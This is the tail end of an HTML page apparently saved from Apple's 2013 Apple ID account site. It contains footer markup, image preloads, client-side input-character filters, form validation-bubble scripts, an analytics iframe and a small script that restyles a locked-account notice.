</ul>

<div class="gf-sosumi">
        <p>Copyright © 2013 Apple Inc. All rights reserved.</p>
        <ul class="piped">
                <li><a href="http://www.apple.com/legal/terms/site.html" class="first">Terms of Use</a></li>
                <li><a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></li>
        </ul>
</div>
<!-- END COPYRIGHT INFORMATION -->
<!-- END INCLUDED FOOTER -->

    </footer><!--/globalfooter-->
    
    <input id="ipapagetitle" type="hidden" value="p5" name="0.79.25" />
    <div class="overlaypanelscreen" id="OverlayPanelScreen" style="position: fixed; top: 0px; left: 0px; opacity: 0.6; height: 100%; width: 100%; display: none; z-index: 10000; "></div>
    
    
    <div id="preload">
       <img width="1" height="1" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/button_bigblue_rightcap_mouseover20091102.gif" />   
       <img width="1" height="1" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/button_bigblue_leftcap_mouseover20091102.gif" />
    </div>
    <div id="preloads">
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_left_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_left_over_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_right_over_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_left_active_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_createid_right_active_20091125.png" width = "1"	height = "1" />  
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_left_over_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_active_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_arrow_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_biggrey_arrow_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_greypill_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_left_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_left_over_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_right_over_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_left_active_20091125.png" width = "1"	height = "1" /> 
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_download_right_active_20091125.png" width = "1"	height = "1" />  
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_check_20091125.png" width = "1"	height = "1" />  
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_verified.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_blue_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_blue_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_light_gray_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_right_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_left_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_right_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_left_over_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_right_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/tooltip_bg.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/tooltip_boot_ie6.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/tooltip_boot.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bluepill_left_active_20091125.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/tooltip_cap.png" width = "1"	height = "1" />
        <img src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_alert_medium_20100910.png" width = "1"	height = "1" />
    </div>
    
    <!-- script type="text/javascript">Data = { arrayCountries: ["Canada - French", "Canada - English", "Canada - Other", "United States - English"] };</script-->
    <script type="text/javascript">
        var img = new Image();      
        var imgarray = ['https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_20091125.png',
                        'https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_active_20091125.png',
                        'https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_left_over_20091125.png',
                        'https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_20091125.png',
                        'https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_active_20091125.png',
                        'https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/images/common/myappleid_bigblue_right_over_20091125.png']     
        for (var i = 0; i < imgarray.length; i++) {
            img.src = imgarray[i];
        }
    </script>
    
    <script type="text/javascript" src="https://a248.e.akamai.net/7/248/51/20130204/appleid.apple.com/myappleid/javascript/masks.js"></script>
   

    
        <script type="text/javascript">
            placeHolderFieldAnimation();
            dsfocus();
        </script>
    
    
    <!-- START FOR XSS -->
    
        <script type="text/javascript"> 
            // create as many white list regular expressions here as you need:
            var digitsOnly = /[1234567890]/g;
            var integerOnly = /[0-9\.]/g;
            var alphaOnly = /[A-Za-z'-.,]/g;
            var companyName = /[A-Za-z0-9'-]/g;
            //var addressLines = /[A-Za-z0-9'-#]/g;

            // create as many black list regular expressions here as you need:
            var nameBlack = /[!@#$%^&*(){}\[\];:<>/?\\|`~"0-9_\+=]/g;
            var zipPostalBlack = /[^a-zA-Z0-9-\s,]/g;
            //var zipPostalBlack = /[^0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,-/\s]/g;
            var zipPostalBlack = /[^a-zA-Z0-9-\s,]/g;
            var companyNameBlock = /[#/!@$%^&*(){}\[\];:<>?\\|`~"_\+=]/g;
            var countryCompStateBlack = /[!@$%^&*(){}\[\];:<>?\\|`~"0-9_\+=#/]/g;
            var addressLinesBlack = /[!@$%^&*{}\[\];:<>?\\|`~"_\+=]/g;
            var jiveBlack = /[!#$%^&*(){}\[\];:<>/?\\|`~"\+=]/g;

            function restrictCharacters(myfield, e, restrictionType) {
                if (!e) var e = window.event;
                if (e.keyCode) code = e.keyCode;
                else if (e.which) code = e.which;
                var character = String.fromCharCode(code);
                
                // if they pressed esc... remove focus from field...
                if (code==27) { this.blur(); return false; }

                // ignore if they are press other keys
                // strange because code: 39 is the down key AND ' key...
                // and DEL also equals .
                var str = "hi "  + code;
                printit(str);
                
                if (!e.ctrlKey && code!=9 && code!=8 && (code!=39 || (code==39 && character=="'"))) {
                    str = str + "KeyCode pass ";
                    printit(str);
 
                    // White list approach
                    /*if (character.match(restrictionType)) {
                        str = str + "White = pass ";
                        printit(str);
                        return true;
                    } else {
                        str = str + "White = fail ";
                        printit(str);
                        return false;
                    }*/
 
                    // Black List approach
                    if (character.match(restrictionType)) {
                        str = str + "Black = fail ";
                        printit(str);
                        return false;
                    } else {
                        str = str + "Black = pass ";
                        printit(str);
                        return true;
                    }
 
                }
            }
            function alpha(e) {
                var k;
                document.all ? k = e.keyCode : k = e.which;
                return ((k > 64 && k < 91) || (k > 96 && k < 123) || k == 8 || k == 32 || (k >= 48 && k <= 57));
            }

            function printit(str) {
                //document.getElementById("testcode").innerHTML = str;
            }

            function pasteAllowed() {
                return false;
            }
        </script>
    
    
    
    
    <!-- END FOR XSS-->
    
    <script type="text/javascript" charset="utf-8">
        function getScrollXY() {
            var scrOfX = 0, scrOfY = 0;
            if( typeof( window.pageYOffset ) == 'number' ) {
                //Netscape compliant
                scrOfY = window.pageYOffset;
                scrOfX = window.pageXOffset;
            } 
            else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
                //DOM compliant
                scrOfY = document.body.scrollTop;
                scrOfX = document.body.scrollLeft;
            } 
            else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
                //IE6 standards compliant mode
                scrOfY = document.documentElement.scrollTop;
                scrOfX = document.documentElement.scrollLeft;
            }
            return [ scrOfX, scrOfY ];
        }
    
        function setTop(validation, container, field) {
        
            validation.removeClassName('horizontal');
            validation.removeClassName('bottom');
            validation.addClassName('top');
            validation.setAttribute('orientation', 'top');
            setHeight(container, field);
        }
        
        function setBottom(validation, container, field) {
        
            validation.removeClassName('horizontal');
            validation.removeClassName('top');
            validation.addClassName('bottom');
            validation.setAttribute('orientation', 'bottom');
            setHeight(container, field);
        }
        
        function setHorizontal(validation, container, field) {
        
            validation.removeClassName('top');
            validation.removeClassName('bottom');
            validation.setAttribute('orientation', 'horizontal');
            setHeight(container, field);
        }
    
        // decides the orientation of the validation box
        function orientation(container, field) {
            if(document.getElementById(field)!=null) {      
                var validation = $(container);
                // hard coded width (css) and generated height
                if(validation.offsetHeight!=null) {
                var validationHeight = validation.offsetHeight;
                }
                var validationWidth = 275;
                var topNavHeight = 45;
            
                // find the offset values
                var scrollOffsetX = getScrollXY()[0];
                var scrollOffsetY = getScrollXY()[1];
                
                // var validationOffsetX = validation.readAttribute('validationOffsetX');
                var passwordOffsetX = parseInt($(field).viewportOffset()[0]) + validationWidth;
                var validationOffsetY =  parseInt($(field).viewportOffset()[1]) - validationHeight;
                var passwordOffsetY =  parseInt($(field).viewportOffset()[1]);
            
                // find the viewport values
                var windowWidth  = window.innerWidth  || (window.document.documentElement.clientWidth  || window.document.body.clientWidth),
                    windowHeight = window.innerHeight || (window.document.documentElement.clientHeight || window.document.body.clientHeight);
                
                var currentOrientation = validation.readAttribute('orientation');
                
                // default, if horizontal display mode available
                if ((validationWidth + passwordOffsetX) < (windowWidth + scrollOffsetX) ) {
                    if(passwordOffsetY < topNavHeight) {
                        if(currentOrientation == 'bottom') return -1;
    
                        setBottom(validation, container, field);
                        return 3;
                    }
                    
                    if(currentOrientation == 'horizontal') return -1;
                    
                    setHorizontal(validation, container, field);
                    return 1;
                }
            
                // if the error message 
                else if ($('server-error') != null && $('server-error').innerHTML.length > 0) {
                    if(currentOrientation == 'top') return -1;
                    
                    setTop(validation, container, field);
                    return 2;
                }
                
                else if (validationOffsetY < topNavHeight) {
                    if(currentOrientation == 'bottom') return -1;
                    
                    setBottom(validation, container, field);
                    return 3;
                }
                
                else {
                    if(currentOrientation == 'top') return -1;
                    setTop(validation, container, field);
                }
            }
        }
    
        function setHeight(container, field) {
            var capSize = 14;
            var validation = $(container);
        
            var topOffset = 0;
            if(validation.offsetHeight!=null ) 
            {
                if(validation.readAttribute('orientation') == 'horizontal') 
                {
                    if(field == 'appleidemailedit' && validation.offsetHeight == 0)
                    topOffset = (-(183 / 2) + capSize) + 'px';
                    else
                    topOffset = (-(validation.offsetHeight / 2) + capSize) + 'px';
                }
                else if(validation.readAttribute('orientation') == 'top') 
                {
                    topOffset = -validation.offsetHeight+ 8 + 'px';
                }
                else
                {
                    if (document.getElementById('appleidedit') != null && field == 'appleid')
                        topOffset = ($(field).offsetHeight) + 25 + 'px';
                    else
                        topOffset = ($(field).offsetHeight) + 'px'; 
                }
            validation.setStyle({ top: topOffset } );       
            }   
        }
    
        function setInitialValidationBubbleClass(container, field) {
            if(document.getElementById(field)!=null) {
                $(field).observe('focus', function(event) {
                    var password = $(field);
                    if(password.value == password.getAttribute('default')) {
                        password.value = "";
                        password.addClassName('has-content');
                    } 
                    $(container).addClassName('validation-show');
                    orientation(container, field); 
                    setHeight(container, field);
                });
        
                $(field).observe('blur', function(event) { 
                    var password = $(field);
                    if(password.value.length == 0) {
                        //password.value = password.getAttribute('default');
                        password.removeClassName('has-content');
                    }
                    $(container).removeClassName('validation-show'); 
                });
            }
        }
    
        function setAfterValidationBubbleClass(container, field, fieldContainer) {
            if(document.getElementById(field) != null) {
        
                document.getElementById(field).onfocus = function(evt) {    
                    document.getElementById(container).style.display = 'block';
                    document.getElementById(fieldContainer).style.display = 'block';
                    setHeight(container, field);
                }
            
                document.getElementById(field).onblur = function(evt) { 
                    if(typeof giveErrorMessage !='undefined' && field=='appleid') {     
                        giveErrorMessage();
                    }
                
                    if(typeof giveErrorMessagePassword !='undefined' && field=='newpasswordfield') {
                        giveErrorMessagePassword()
                    }
                
                    document.getElementById(container).style.display = 'none';
                    if (this.getAttribute("mandatory") == "yes") {  //Start 'mandatory' 
                        errorID= this.id+"1";
                        if (document.getElementById(errorID).style.display == 'block') {    //Start block
                            if(this.value != '' && field=='newpasswordfield') {     //Start 'newpasswordfield'
                                var passwordIdDiv = document.getElementById('newpasswordfield1');
                                var children = passwordIdDiv.getElementsByTagName('span');      // getting all span tag
                                  for(var i = 0; i< children.length;i++)
                                  {
                                    if (children[i].getAttribute('id') == 'errorSpan')      // span with id errorSpan
                                    {
                                        var errorSpan=children[i].innerHTML;                             
                                        var passwordErrorSpan = document.getElementById('passwordErrorSpan').innerHTML;                         
                                        if(errorSpan!='' && passwordErrorSpan!='') {
                                            children[i].innerHTML='';
                                        }
                                    }
                                 }
                            }   //end 'newpasswordfield'
                    
                    
                        //for appleid field
                         if(this.value != '' &&  field=='appleid') {    //Start 'appleid'   
                            var appleIdDiv = document.getElementById('appleid1');
                            var children = appleIdDiv.getElementsByTagName('span');     // getting all span tag
                              for(var i = 0; i< children.length;i++)
                              {
                                if (children[i].getAttribute('id') == 'errorSpan')      // span with id errorSpan
                                {
                                    var errorSpan=children[i].innerHTML;                                
                                    var appleIdErrorSpan = document.getElementById('appleIdErrorSpan').innerHTML;                               
                                    if(errorSpan!='' && appleIdErrorSpan!='') {
                                        children[i].innerHTML='';
                                    }
                                }
                              }
                            }   //end 'appleid'
                        }   //end block
                    }   //end 'mandatory'       
                }
            }
        }
    </script>
    
    
    
    <script type="text/javascript">
        // sets the height depending on the orientation
        
        Event.onDOMReady(function() {
            // calculate the height of the element and divides that by two to center it
            // the value is inversed so as to pull the window above the target
            // the offset of 12 is added to account for the height of the field form element
            // new Ajax.Request('/myappleid/create/rules/rules.json', {
            // method:'get',
            //  
            // onSuccess: function(result) {
            //      var response = result.responseText.evalJSON();
            //      for (var i=0; i < response.passwordrules.length; i++) {
            //          $('password_validation_ul').insert('<li id=\"' + response.passwordrules[i].id + '\">' + response.passwordrules[i].text + '</li>');
            //      };yes
            //  }
            //});
            
            // we can use simple onresize event
            /*if (window.addEventListener) {
                window.addEventListener("resize", orientation('appleid-validation-wrapper', 'appleid'), false);
                window.addEventListener("resize", orientation('password-validation-wrapper', 'newpasswordfield'), false);
            }
            else if (window.attachEvent) {
                window.attachEvent("onresize", orientation('appleid-validation-wrapper', 'appleid'));
                window.attachEvent("onresize", orientation('password-validation-wrapper', 'newpasswordfield'));
            }*/
            
            window.onresize = function (e) {
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleid') != null)
                    orientation('appleid-validation-wrapper', 'appleid');
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleidedit') != null)
                    orientation('appleid-validation-wrapper', 'appleidedit');
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleidemailedit') != null)
                    orientation('appleid-validation-wrapper', 'appleidemailedit');
                if(document.getElementById('password-validation-wrapper') != null)
                    orientation('password-validation-wrapper', 'newpasswordfield');
            }
            
            window.onscroll = function (e) {
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleid') != null)
                    orientation('appleid-validation-wrapper', 'appleid');
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleidedit') != null)
                    orientation('appleid-validation-wrapper', 'appleidedit');
                if(document.getElementById('appleid-validation-wrapper') != null && document.getElementById('appleidemailedit') != null)
                    orientation('appleid-validation-wrapper', 'appleidemailedit');
                if(document.getElementById('password-validation-wrapper') != null) 
                    orientation('password-validation-wrapper', 'newpasswordfield');
            }
            
            setInitialValidationBubbleClass('password-validation-wrapper', 'newpasswordfield');
            setInitialValidationBubbleClass('appleid-validation-wrapper', 'appleid');
            setInitialValidationBubbleClass('appleid-validation-wrapper', 'appleidedit');
            setInitialValidationBubbleClass('appleid-validation-wrapper', 'appleidemailedit');
        });
    </script>
    
    <!-- SiteCatalyst code version: H.8. Copyright 1997-2006 Omniture, Inc. --> 
    <script type="text/javascript">
            var g=document.URL,
            r=document.referrer,
//          url="https://ssl.apple.com/global/metrics/us/us.myinfo.metrics.html?gn="+ document.getElementById("ipapagetitle").value +"&g="+g+"&r="+r,
            url="https://ssl.apple.com/metrics/html/myinfo.metrics.html?gn="+ document.getElementById("ipapagetitle").value +"&g="+g+"&r="+r,
            frame = document.createElement("iframe");
            frame.setAttribute("src", url);
            frame.setAttribute("frameborder", 0);
            frame.setAttribute("height", 0);
            frame.setAttribute("width", 0);
            frame.setAttribute("allowTransparency","true");
            frame.setAttribute("background-color","transparent");
            frame.setAttribute("scrolling","no");
            document.body.appendChild(frame);
    </script>
    <!-- End SiteCatalyst code version: H.8. -->
      
    <script> if (self == top ) { document.getElementsByTagName("body")[0].style.display = 'block' ;} else { top.location = self.location ; }</script>
    </body>
</html>

<script type="text/javascript">
		window.onload=function() {
		var lockedpageText = document.getElementsByTagName('span')[10].innerHTML;
	if(lockedpageText.indexOf('Visit iForgot to reset your account (https://iforgot.apple.com).')>=0)
	{
		var Element = document.getElementsByTagName('span')[9];
		if(Element.className.toString()=="alert")
		{
			Element.style.marginRight="36%";
		}
		
	}
	}
		//alert("false");
	if("false" == "true"){		
			timeIt();
		
		}
	</script>
